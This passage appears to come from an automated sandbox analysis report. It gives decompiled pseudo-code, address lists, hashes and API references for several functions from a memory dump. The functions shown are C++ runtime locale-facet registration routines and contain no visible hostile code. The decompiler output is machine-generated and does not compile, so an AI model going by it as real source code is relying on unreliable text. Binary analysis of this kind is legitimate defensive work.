											if(_t245 == 0) {
												_push( *((intOrPtr*)(_t256 + 8)));
												_push(_t256 - 0x10);
												__eflags = E6E1A61B3(_t179, _t238, _t245) - 0xffffffff;
												if(__eflags == 0) {
													E6E161CB5(__eflags);
													asm("int3");
													E6E1A9DBF(0x6e1ec3ec, _t179, _t238, _t245, 8);
													E6E18F2A5(_t256 - 0x14, 0);
													_t246 =  *0x6e221768; // 0x0
													 *(_t256 - 4) =  *(_t256 - 4) & 0x00000000;
													 *(_t256 - 0x10) = _t246;
													_t239 = E6E162171( *((intOrPtr*)(_t256 + 8)), E6E161F29(_t179, 0x6e22174c, _t238, _t246));
													__eflags = _t239;
													if(_t239 != 0) {
														L26:
														E6E18F30C(_t256 - 0x14);
														return E6E1A9D88(_t239);
													} else {
														__eflags = _t246;
														if(_t246 == 0) {
															_push( *((intOrPtr*)(_t256 + 8)));
															_push(_t256 - 0x10);
															__eflags = E6E1A6237(_t179, _t239, _t246) - 0xffffffff;
															if(__eflags == 0) {
																E6E161CB5(__eflags);
																asm("int3");
																E6E1A9DBF(0x6e1ec3ec, _t179, _t239, _t246, 8);
																E6E18F2A5(_t256 - 0x14, 0);
																_t247 =  *0x6e221770; // 0x0
																 *(_t256 - 4) =  *(_t256 - 4) & 0x00000000;
																 *(_t256 - 0x10) = _t247;
																_t240 = E6E162171( *((intOrPtr*)(_t256 + 8)), E6E161F29(_t179, 0x6e221754, _t239, _t247));
																__eflags = _t240;
																if(_t240 != 0) {
																	L33:
																	E6E18F30C(_t256 - 0x14);
																	return E6E1A9D88(_t240);
																} else {
																	__eflags = _t247;
																	if(_t247 == 0) {
																		_push( *((intOrPtr*)(_t256 + 8)));
																		_push(_t256 - 0x10);
																		__eflags = E6E1A62BC(_t179, _t240, _t247) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E161CB5(__eflags);
																			asm("int3");
																			E6E1A9DBF(0x6e1ec3ec, _t179, _t240, _t247, 8);
																			E6E18F2A5(_t256 - 0x14, 0);
																			_t248 =  *0x6e221774; // 0x0
																			 *(_t256 - 4) =  *(_t256 - 4) & 0x00000000;
																			 *(_t256 - 0x10) = _t248;
																			_t241 = E6E162171( *((intOrPtr*)(_t256 + 8)), E6E161F29(_t179, 0x6e221758, _t240, _t248));
																			__eflags = _t241;
																			if(_t241 != 0) {
																				L40:
																				E6E18F30C(_t256 - 0x14);
																				return E6E1A9D88(_t241);
																			} else {
																				__eflags = _t248;
																				if(_t248 == 0) {
																					_push( *((intOrPtr*)(_t256 + 8)));
																					_push(_t256 - 0x10);
																					_t146 = E6E1A6328(_t179, _t241, _t248);
																					_pop(_t215);
																					__eflags = _t146 - 0xffffffff;
																					if(__eflags == 0) {
																						E6E161CB5(__eflags);
																						asm("int3");
																						E6E1A9DBF(0x6e1ecb1a, _t179, _t241, _t248, 4);
																						_t249 = _t215;
																						 *(_t256 - 0x10) = _t249;
																						 *((intOrPtr*)(_t249 + 4)) =  *((intOrPtr*)(_t256 + 0xc));
																						_push( *((intOrPtr*)(_t256 + 0x14)));
																						_t79 = _t256 - 4;
																						 *_t79 =  *(_t256 - 4) & 0x00000000;
																						__eflags =  *_t79;
																						 *_t249 = 0x6e1f25a4;
																						 *((char*)(_t249 + 0x28)) =  *((intOrPtr*)(_t256 + 0x10));
																						E6E1A7184(_t179, _t215, _t234, _t241, _t249,  *_t79);
																						return E6E1A9D88(_t249,  *((intOrPtr*)(_t256 + 8)));
																					} else {
																						_t241 =  *(_t256 - 0x10);
																						 *(_t256 - 0x10) = _t241;
																						 *(_t256 - 4) = 1;
																						E6E1911C1(__eflags, _t241);
																						 *0x6e1ee1b4();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t241 + 4))))();
																						 *0x6e221774 = _t241;
																						goto L40;
																					}
																				} else {
																					_t241 = _t248;
																					goto L40;
																				}
																			}
																		} else {
																			_t240 =  *(_t256 - 0x10);
																			 *(_t256 - 0x10) = _t240;
																			 *(_t256 - 4) = 1;
																			E6E1911C1(__eflags, _t240);
																			 *0x6e1ee1b4();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t240 + 4))))();
																			 *0x6e221770 = _t240;
																			goto L33;
																		}
																	} else {
																		_t240 = _t247;
																		goto L33;
																	}
																}
															} else {
																_t239 =  *(_t256 - 0x10);
																 *(_t256 - 0x10) = _t239;
																 *(_t256 - 4) = 1;
																E6E1911C1(__eflags, _t239);
																 *0x6e1ee1b4();
																 *((intOrPtr*)( *((intOrPtr*)( *_t239 + 4))))();
																 *0x6e221768 = _t239;
																goto L26;
															}
														} else {
															_t239 = _t246;
															goto L26;
														}
													}
												} else {
													_t238 =  *(_t256 - 0x10);
													 *(_t256 - 0x10) = _t238;
													 *(_t256 - 4) = 1;
													E6E1911C1(__eflags, _t238);
													 *0x6e1ee1b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t238 + 4))))();
													 *0x6e22176c = _t238;
													goto L19;
												}
											} else {
												_t238 = _t245;
												goto L19;
											}
										}
									} else {
										_t237 =  *(_t256 - 0x10);
										 *(_t256 - 0x10) = _t237;
										 *(_t256 - 4) = 1;
										E6E1911C1(__eflags, _t237);
										 *0x6e1ee1b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t237 + 4))))();
										 *0x6e221764 = _t237;
										goto L12;
									}
								} else {
									_t237 = _t244;
									goto L12;
								}
							}
						} else {
							_t236 =  *(_t256 - 0x10);
							 *(_t256 - 0x10) = _t236;
							 *(_t256 - 4) = 1;
							E6E1911C1(__eflags, _t236);
							 *0x6e1ee1b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t236 + 4))))();
							 *0x6e221760 = _t236;
							goto L5;
						}
					} else {
						_t236 = _t243;
						goto L5;
					}
				}
			}

0x6e1a5aca
0x6e1a5ad1
0x6e1a5adb
0x6e1a5ae0
0x6e1a5aeb
0x6e1a5aef
0x6e1a5afb
0x6e1a5b00
0x6e1a5b04
0x6e1a5b49
0x6e1a5b4c
0x6e1a5b58
0x6e1a5b06
0x6e1a5b08
0x6e1a5b0e
0x6e1a5b14
0x6e1a5b1c
0x6e1a5b1f
0x6e1a5b59
0x6e1a5b5e
0x6e1a5b66
0x6e1a5b70
0x6e1a5b75
0x6e1a5b80
0x6e1a5b84
0x6e1a5b95
0x6e1a5b97
0x6e1a5b99
0x6e1a5bde
0x6e1a5be1
0x6e1a5bed
0x6e1a5b9b
0x6e1a5b9b
0x6e1a5b9d
0x6e1a5ba3
0x6e1a5ba9
0x6e1a5bb1
0x6e1a5bb4
0x6e1a5bee
0x6e1a5bf3
0x6e1a5bfb
0x6e1a5c05
0x6e1a5c0a
0x6e1a5c15
0x6e1a5c19
0x6e1a5c2a
0x6e1a5c2c
0x6e1a5c2e
0x6e1a5c73
0x6e1a5c76
0x6e1a5c82
0x6e1a5c30
0x6e1a5c30
0x6e1a5c32
0x6e1a5c38
0x6e1a5c3e
0x6e1a5c46
0x6e1a5c49
0x6e1a5c83
0x6e1a5c88
0x6e1a5c90
0x6e1a5c9a
0x6e1a5c9f
0x6e1a5caa
0x6e1a5cae
0x6e1a5cbf
0x6e1a5cc1
0x6e1a5cc3
0x6e1a5d08
0x6e1a5d0b
0x6e1a5d17
0x6e1a5cc5
0x6e1a5cc5
0x6e1a5cc7
0x6e1a5ccd
0x6e1a5cd3
0x6e1a5cdb
0x6e1a5cde
0x6e1a5d18
0x6e1a5d1d
0x6e1a5d25
0x6e1a5d2f
0x6e1a5d34
0x6e1a5d3f
0x6e1a5d43
0x6e1a5d54
0x6e1a5d56
0x6e1a5d58
0x6e1a5d9d
0x6e1a5da0
0x6e1a5dac
0x6e1a5d5a
0x6e1a5d5a
0x6e1a5d5c
0x6e1a5d62
0x6e1a5d68
0x6e1a5d70
0x6e1a5d73
0x6e1a5dad
0x6e1a5db2
0x6e1a5dba
0x6e1a5dc4
0x6e1a5dc9
0x6e1a5dd4
0x6e1a5dd8
0x6e1a5de9
0x6e1a5deb
0x6e1a5ded
0x6e1a5e32
0x6e1a5e35
0x6e1a5e41
0x6e1a5def
0x6e1a5def
0x6e1a5df1
0x6e1a5df7
0x6e1a5dfd
0x6e1a5dfe
0x6e1a5e04
0x6e1a5e05
0x6e1a5e08
0x6e1a5e42
0x6e1a5e47
0x6e1a5e4f
0x6e1a5e54
0x6e1a5e56
0x6e1a5e5c
0x6e1a5e5f
0x6e1a5e68
0x6e1a5e68
0x6e1a5e68
0x6e1a5e6c
0x6e1a5e72
0x6e1a5e75
0x6e1a5e81
0x6e1a5e0a
0x6e1a5e0a
0x6e1a5e0d
0x6e1a5e11
0x6e1a5e15
0x6e1a5e22
0x6e1a5e2a
0x6e1a5e2c
0x00000000
0x6e1a5e2c
0x6e1a5df3
0x6e1a5df3
0x00000000
0x6e1a5df3
0x6e1a5df1
0x6e1a5d75
0x6e1a5d75
0x6e1a5d78
0x6e1a5d7c
0x6e1a5d80
0x6e1a5d8d
0x6e1a5d95
0x6e1a5d97
0x00000000
0x6e1a5d97
0x6e1a5d5e
0x6e1a5d5e
0x00000000
0x6e1a5d5e
0x6e1a5d5c
0x6e1a5ce0
0x6e1a5ce0
0x6e1a5ce3
0x6e1a5ce7
0x6e1a5ceb
0x6e1a5cf8
0x6e1a5d00
0x6e1a5d02
0x00000000
0x6e1a5d02
0x6e1a5cc9
0x6e1a5cc9
0x00000000
0x6e1a5cc9
0x6e1a5cc7
0x6e1a5c4b
0x6e1a5c4b
0x6e1a5c4e
0x6e1a5c52
0x6e1a5c56
0x6e1a5c63
0x6e1a5c6b
0x6e1a5c6d
0x00000000
0x6e1a5c6d
0x6e1a5c34
0x6e1a5c34
0x00000000
0x6e1a5c34
0x6e1a5c32
0x6e1a5bb6
0x6e1a5bb6
0x6e1a5bb9
0x6e1a5bbd
0x6e1a5bc1
0x6e1a5bce
0x6e1a5bd6
0x6e1a5bd8
0x00000000
0x6e1a5bd8
0x6e1a5b9f
0x6e1a5b9f
0x00000000
0x6e1a5b9f
0x6e1a5b9d
0x6e1a5b21
0x6e1a5b21
0x6e1a5b24
0x6e1a5b28
0x6e1a5b2c
0x6e1a5b39
0x6e1a5b41
0x6e1a5b43
0x00000000
0x6e1a5b43
0x6e1a5b0a
0x6e1a5b0a
0x00000000
0x6e1a5b0a
0x6e1a5b08

APIs

__EH_prolog3.LIBCMT ref: 6E1A5AD1
std::_Lockit::_Lockit.LIBCPMT ref: 6E1A5ADB

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E1A5B2C
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A5B4C
Concurrency::cancel_current_task.LIBCPMT ref: 6E1A5B59

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: 4bb6d058d6ab0380a994999c1c51bf81a375c4d2895b10ab47d99573a9d42e54
Instruction ID: 7309d9075ccbe0192cc3475ae642f733b615cd0d104a48ee4987bd0c9e5fc04a
Opcode Fuzzy Hash: 4bb6d058d6ab0380a994999c1c51bf81a375c4d2895b10ab47d99573a9d42e54
Instruction Fuzzy Hash: 3B01C479900119CFCF05DBE8D910AFDBB7ABF84314F244809E921AB280CF309AC4EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5B5F, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E1A5B5F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t74;
				void* _t123;
				signed int _t182;
				void* _t198;
				signed int _t201;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int _t211;
				void* _t217;

				_t152 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t217 - 0x14, 0);
				_t206 =  *0x6e221764; // 0x0
				 *(_t217 - 4) =  *(_t217 - 4) & 0x00000000;
				 *(_t217 - 0x10) = _t206;
				_t74 = E6E162171( *((intOrPtr*)(_t217 + 8)), E6E161F29(__ebx, 0x6e221748, __edi, _t206));
				_t200 = _t74;
				if(_t74 != 0) {
					L5:
					E6E18F30C(_t217 - 0x14);
					return E6E1A9D88(_t200);
				} else {
					if(_t206 == 0) {
						_push( *((intOrPtr*)(_t217 + 8)));
						_push(_t217 - 0x10);
						__eflags = E6E1A614B(__ebx, _t200, _t206) - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							E6E1A9DBF(0x6e1ec3ec, _t152, _t200, _t206, 8);
							E6E18F2A5(_t217 - 0x14, 0);
							_t207 =  *0x6e22176c; // 0x0
							 *(_t217 - 4) =  *(_t217 - 4) & 0x00000000;
							 *(_t217 - 0x10) = _t207;
							_t201 = E6E162171( *((intOrPtr*)(_t217 + 8)), E6E161F29(_t152, 0x6e221750, _t200, _t207));
							__eflags = _t201;
							if(_t201 != 0) {
								L12:
								E6E18F30C(_t217 - 0x14);
								return E6E1A9D88(_t201);
							} else {
								__eflags = _t207;
								if(_t207 == 0) {
									_push( *((intOrPtr*)(_t217 + 8)));
									_push(_t217 - 0x10);
									__eflags = E6E1A61B3(_t152, _t201, _t207) - 0xffffffff;
									if(__eflags == 0) {
										E6E161CB5(__eflags);
										asm("int3");
										E6E1A9DBF(0x6e1ec3ec, _t152, _t201, _t207, 8);
										E6E18F2A5(_t217 - 0x14, 0);
										_t208 =  *0x6e221768; // 0x0
										 *(_t217 - 4) =  *(_t217 - 4) & 0x00000000;
										 *(_t217 - 0x10) = _t208;
										_t202 = E6E162171( *((intOrPtr*)(_t217 + 8)), E6E161F29(_t152, 0x6e22174c, _t201, _t208));
										__eflags = _t202;
										if(_t202 != 0) {
											L19:
											E6E18F30C(_t217 - 0x14);
											return E6E1A9D88(_t202);
										} else {
											__eflags = _t208;
											if(_t208 == 0) {
												_push( *((intOrPtr*)(_t217 + 8)));
												_push(_t217 - 0x10);
												__eflags = E6E1A6237(_t152, _t202, _t208) - 0xffffffff;
												if(__eflags == 0) {
													E6E161CB5(__eflags);
													asm("int3");
													E6E1A9DBF(0x6e1ec3ec, _t152, _t202, _t208, 8);
													E6E18F2A5(_t217 - 0x14, 0);
													_t209 =  *0x6e221770; // 0x0
													 *(_t217 - 4) =  *(_t217 - 4) & 0x00000000;
													 *(_t217 - 0x10) = _t209;
													_t203 = E6E162171( *((intOrPtr*)(_t217 + 8)), E6E161F29(_t152, 0x6e221754, _t202, _t209));
													__eflags = _t203;
													if(_t203 != 0) {
														L26:
														E6E18F30C(_t217 - 0x14);
														return E6E1A9D88(_t203);
													} else {
														__eflags = _t209;
														if(_t209 == 0) {
															_push( *((intOrPtr*)(_t217 + 8)));
															_push(_t217 - 0x10);
															__eflags = E6E1A62BC(_t152, _t203, _t209) - 0xffffffff;
															if(__eflags == 0) {
																E6E161CB5(__eflags);
																asm("int3");
																E6E1A9DBF(0x6e1ec3ec, _t152, _t203, _t209, 8);
																E6E18F2A5(_t217 - 0x14, 0);
																_t210 =  *0x6e221774; // 0x0
																 *(_t217 - 4) =  *(_t217 - 4) & 0x00000000;
																 *(_t217 - 0x10) = _t210;
																_t204 = E6E162171( *((intOrPtr*)(_t217 + 8)), E6E161F29(_t152, 0x6e221758, _t203, _t210));
																__eflags = _t204;
																if(_t204 != 0) {
																	L33:
																	E6E18F30C(_t217 - 0x14);
																	return E6E1A9D88(_t204);
																} else {
																	__eflags = _t210;
																	if(_t210 == 0) {
																		_push( *((intOrPtr*)(_t217 + 8)));
																		_push(_t217 - 0x10);
																		_t123 = E6E1A6328(_t152, _t204, _t210);
																		_pop(_t182);
																		__eflags = _t123 - 0xffffffff;
																		if(__eflags == 0) {
																			E6E161CB5(__eflags);
																			asm("int3");
																			E6E1A9DBF(0x6e1ecb1a, _t152, _t204, _t210, 4);
																			_t211 = _t182;
																			 *(_t217 - 0x10) = _t211;
																			 *((intOrPtr*)(_t211 + 4)) =  *((intOrPtr*)(_t217 + 0xc));
																			_push( *((intOrPtr*)(_t217 + 0x14)));
																			_t67 = _t217 - 4;
																			 *_t67 =  *(_t217 - 4) & 0x00000000;
																			__eflags =  *_t67;
																			 *_t211 = 0x6e1f25a4;
																			 *((char*)(_t211 + 0x28)) =  *((intOrPtr*)(_t217 + 0x10));
																			E6E1A7184(_t152, _t182, _t198, _t204, _t211,  *_t67);
																			return E6E1A9D88(_t211,  *((intOrPtr*)(_t217 + 8)));
																		} else {
																			_t204 =  *(_t217 - 0x10);
																			 *(_t217 - 0x10) = _t204;
																			 *(_t217 - 4) = 1;
																			E6E1911C1(__eflags, _t204);
																			 *0x6e1ee1b4();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t204 + 4))))();
																			 *0x6e221774 = _t204;
																			goto L33;
																		}
																	} else {
																		_t204 = _t210;
																		goto L33;
																	}
																}
															} else {
																_t203 =  *(_t217 - 0x10);
																 *(_t217 - 0x10) = _t203;
																 *(_t217 - 4) = 1;
																E6E1911C1(__eflags, _t203);
																 *0x6e1ee1b4();
																 *((intOrPtr*)( *((intOrPtr*)( *_t203 + 4))))();
																 *0x6e221770 = _t203;
																goto L26;
															}
														} else {
															_t203 = _t209;
															goto L26;
														}
													}
												} else {
													_t202 =  *(_t217 - 0x10);
													 *(_t217 - 0x10) = _t202;
													 *(_t217 - 4) = 1;
													E6E1911C1(__eflags, _t202);
													 *0x6e1ee1b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t202 + 4))))();
													 *0x6e221768 = _t202;
													goto L19;
												}
											} else {
												_t202 = _t208;
												goto L19;
											}
										}
									} else {
										_t201 =  *(_t217 - 0x10);
										 *(_t217 - 0x10) = _t201;
										 *(_t217 - 4) = 1;
										E6E1911C1(__eflags, _t201);
										 *0x6e1ee1b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t201 + 4))))();
										 *0x6e22176c = _t201;
										goto L12;
									}
								} else {
									_t201 = _t207;
									goto L12;
								}
							}
						} else {
							_t200 =  *(_t217 - 0x10);
							 *(_t217 - 0x10) = _t200;
							 *(_t217 - 4) = 1;
							E6E1911C1(__eflags, _t200);
							 *0x6e1ee1b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t200 + 4))))();
							 *0x6e221764 = _t200;
							goto L5;
						}
					} else {
						_t200 = _t206;
						goto L5;
					}
				}
			}

0x6e1a5b5f
0x6e1a5b66
0x6e1a5b70
0x6e1a5b75
0x6e1a5b80
0x6e1a5b84
0x6e1a5b90
0x6e1a5b95
0x6e1a5b99
0x6e1a5bde
0x6e1a5be1
0x6e1a5bed
0x6e1a5b9b
0x6e1a5b9d
0x6e1a5ba3
0x6e1a5ba9
0x6e1a5bb1
0x6e1a5bb4
0x6e1a5bee
0x6e1a5bf3
0x6e1a5bfb
0x6e1a5c05
0x6e1a5c0a
0x6e1a5c15
0x6e1a5c19
0x6e1a5c2a
0x6e1a5c2c
0x6e1a5c2e
0x6e1a5c73
0x6e1a5c76
0x6e1a5c82
0x6e1a5c30
0x6e1a5c30
0x6e1a5c32
0x6e1a5c38
0x6e1a5c3e
0x6e1a5c46
0x6e1a5c49
0x6e1a5c83
0x6e1a5c88
0x6e1a5c90
0x6e1a5c9a
0x6e1a5c9f
0x6e1a5caa
0x6e1a5cae
0x6e1a5cbf
0x6e1a5cc1
0x6e1a5cc3
0x6e1a5d08
0x6e1a5d0b
0x6e1a5d17
0x6e1a5cc5
0x6e1a5cc5
0x6e1a5cc7
0x6e1a5ccd
0x6e1a5cd3
0x6e1a5cdb
0x6e1a5cde
0x6e1a5d18
0x6e1a5d1d
0x6e1a5d25
0x6e1a5d2f
0x6e1a5d34
0x6e1a5d3f
0x6e1a5d43
0x6e1a5d54
0x6e1a5d56
0x6e1a5d58
0x6e1a5d9d
0x6e1a5da0
0x6e1a5dac
0x6e1a5d5a
0x6e1a5d5a
0x6e1a5d5c
0x6e1a5d62
0x6e1a5d68
0x6e1a5d70
0x6e1a5d73
0x6e1a5dad
0x6e1a5db2
0x6e1a5dba
0x6e1a5dc4
0x6e1a5dc9
0x6e1a5dd4
0x6e1a5dd8
0x6e1a5de9
0x6e1a5deb
0x6e1a5ded
0x6e1a5e32
0x6e1a5e35
0x6e1a5e41
0x6e1a5def
0x6e1a5def
0x6e1a5df1
0x6e1a5df7
0x6e1a5dfd
0x6e1a5dfe
0x6e1a5e04
0x6e1a5e05
0x6e1a5e08
0x6e1a5e42
0x6e1a5e47
0x6e1a5e4f
0x6e1a5e54
0x6e1a5e56
0x6e1a5e5c
0x6e1a5e5f
0x6e1a5e68
0x6e1a5e68
0x6e1a5e68
0x6e1a5e6c
0x6e1a5e72
0x6e1a5e75
0x6e1a5e81
0x6e1a5e0a
0x6e1a5e0a
0x6e1a5e0d
0x6e1a5e11
0x6e1a5e15
0x6e1a5e22
0x6e1a5e2a
0x6e1a5e2c
0x00000000
0x6e1a5e2c
0x6e1a5df3
0x6e1a5df3
0x00000000
0x6e1a5df3
0x6e1a5df1
0x6e1a5d75
0x6e1a5d75
0x6e1a5d78
0x6e1a5d7c
0x6e1a5d80
0x6e1a5d8d
0x6e1a5d95
0x6e1a5d97
0x00000000
0x6e1a5d97
0x6e1a5d5e
0x6e1a5d5e
0x00000000
0x6e1a5d5e
0x6e1a5d5c
0x6e1a5ce0
0x6e1a5ce0
0x6e1a5ce3
0x6e1a5ce7
0x6e1a5ceb
0x6e1a5cf8
0x6e1a5d00
0x6e1a5d02
0x00000000
0x6e1a5d02
0x6e1a5cc9
0x6e1a5cc9
0x00000000
0x6e1a5cc9
0x6e1a5cc7
0x6e1a5c4b
0x6e1a5c4b
0x6e1a5c4e
0x6e1a5c52
0x6e1a5c56
0x6e1a5c63
0x6e1a5c6b
0x6e1a5c6d
0x00000000
0x6e1a5c6d
0x6e1a5c34
0x6e1a5c34
0x00000000
0x6e1a5c34
0x6e1a5c32
0x6e1a5bb6
0x6e1a5bb6
0x6e1a5bb9
0x6e1a5bbd
0x6e1a5bc1
0x6e1a5bce
0x6e1a5bd6
0x6e1a5bd8
0x00000000
0x6e1a5bd8
0x6e1a5b9f
0x6e1a5b9f
0x00000000
0x6e1a5b9f
0x6e1a5b9d

APIs

__EH_prolog3.LIBCMT ref: 6E1A5B66
std::_Lockit::_Lockit.LIBCPMT ref: 6E1A5B70

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E1A5BC1
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A5BE1
Concurrency::cancel_current_task.LIBCPMT ref: 6E1A5BEE

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: 3b6e886f5c190a6dbbe6e1c9471ac319a40ee38874849bcd7e33f18b27fb2d75
Instruction ID: f784c16ac2074349849e473471499696e2d9237f722dcf791dedc2107dfd37d2
Opcode Fuzzy Hash: 3b6e886f5c190a6dbbe6e1c9471ac319a40ee38874849bcd7e33f18b27fb2d75
Instruction Fuzzy Hash: F601C4799041198BCF05DBE8C914AFD77BABFC4314F240819E911AB280CF3099C8EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E19981C, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E6E19981C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t38;
				void* _t54;
				signed int _t83;
				void* _t90;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t97;
				void* _t100;

				_t71 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t100 - 0x14, 0);
				_t95 =  *0x6e221738; // 0x0
				 *(_t100 - 4) =  *(_t100 - 4) & 0x00000000;
				 *(_t100 - 0x10) = _t95;
				_t38 = E6E162171( *((intOrPtr*)(_t100 + 8)), E6E161F29(__ebx, 0x6e2216e4, __edi, _t95));
				_t92 = _t38;
				if(_t38 != 0) {
					L5:
					E6E18F30C(_t100 - 0x14);
					return E6E1A9D88(_t92);
				} else {
					if(_t95 == 0) {
						_push( *((intOrPtr*)(_t100 + 8)));
						_push(_t100 - 0x10);
						__eflags = E6E19B210(__ebx, _t92, _t95) - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							E6E1A9DBF(0x6e1ec3ec, _t71, _t92, _t95, 8);
							E6E18F2A5(_t100 - 0x14, 0);
							_t96 =  *0x6e221708; // 0x0
							 *(_t100 - 4) =  *(_t100 - 4) & 0x00000000;
							 *(_t100 - 0x10) = _t96;
							_t93 = E6E162171( *((intOrPtr*)(_t100 + 8)), E6E161F29(_t71, 0x6e221698, _t92, _t96));
							__eflags = _t93;
							if(_t93 != 0) {
								L12:
								E6E18F30C(_t100 - 0x14);
								return E6E1A9D88(_t93);
							} else {
								__eflags = _t96;
								if(_t96 == 0) {
									_push( *((intOrPtr*)(_t100 + 8)));
									_push(_t100 - 0x10);
									_t54 = E6E19B284(_t71, _t93, _t96);
									_pop(_t83);
									__eflags = _t54 - 0xffffffff;
									if(__eflags == 0) {
										E6E161CB5(__eflags);
										asm("int3");
										E6E1A9DBF(0x6e1ecb1a, _t71, _t93, _t96, 4);
										_t97 = _t83;
										 *(_t100 - 0x10) = _t97;
										 *((intOrPtr*)(_t97 + 4)) =  *((intOrPtr*)(_t100 + 0xc));
										_push( *((intOrPtr*)(_t100 + 0x14)));
										_t31 = _t100 - 4;
										 *_t31 =  *(_t100 - 4) & 0x00000000;
										__eflags =  *_t31;
										 *_t97 = 0x6e1f225c;
										 *((char*)(_t97 + 0x28)) =  *((intOrPtr*)(_t100 + 0x10));
										E6E19F3D8(_t71, _t83, _t90, _t93, _t97,  *_t31);
										return E6E1A9D88(_t97,  *((intOrPtr*)(_t100 + 8)));
									} else {
										_t93 =  *(_t100 - 0x10);
										 *(_t100 - 0x10) = _t93;
										 *(_t100 - 4) = 1;
										E6E1911C1(__eflags, _t93);
										 *0x6e1ee1b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t93 + 4))))();
										 *0x6e221708 = _t93;
										goto L12;
									}
								} else {
									_t93 = _t96;
									goto L12;
								}
							}
						} else {
							_t92 =  *(_t100 - 0x10);
							 *(_t100 - 0x10) = _t92;
							 *(_t100 - 4) = 1;
							E6E1911C1(__eflags, _t92);
							 *0x6e1ee1b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t92 + 4))))();
							 *0x6e221738 = _t92;
							goto L5;
						}
					} else {
						_t92 = _t95;
						goto L5;
					}
				}
			}

0x6e19981c
0x6e199823
0x6e19982d
0x6e199832
0x6e19983d
0x6e199841
0x6e19984d
0x6e199852
0x6e199856
0x6e19989b
0x6e19989e
0x6e1998aa
0x6e199858
0x6e19985a
0x6e199860
0x6e199866
0x6e19986e
0x6e199871
0x6e1998ab
0x6e1998b0
0x6e1998b8
0x6e1998c2
0x6e1998c7
0x6e1998d2
0x6e1998d6
0x6e1998e7
0x6e1998e9
0x6e1998eb
0x6e199930
0x6e199933
0x6e19993f
0x6e1998ed
0x6e1998ed
0x6e1998ef
0x6e1998f5
0x6e1998fb
0x6e1998fc
0x6e199902
0x6e199903
0x6e199906
0x6e199940
0x6e199945
0x6e19994d
0x6e199952
0x6e199954
0x6e19995a
0x6e19995d
0x6e199966
0x6e199966
0x6e199966
0x6e19996a
0x6e199970
0x6e199973
0x6e19997f
0x6e199908
0x6e199908
0x6e19990b
0x6e19990f
0x6e199913
0x6e199920
0x6e199928
0x6e19992a
0x00000000
0x6e19992a
0x6e1998f1
0x6e1998f1
0x00000000
0x6e1998f1
0x6e1998ef
0x6e199873
0x6e199873
0x6e199876
0x6e19987a
0x6e19987e
0x6e19988b
0x6e199893
0x6e199895
0x00000000
0x6e199895
0x6e19985c
0x6e19985c
0x00000000
0x6e19985c
0x6e19985a

APIs

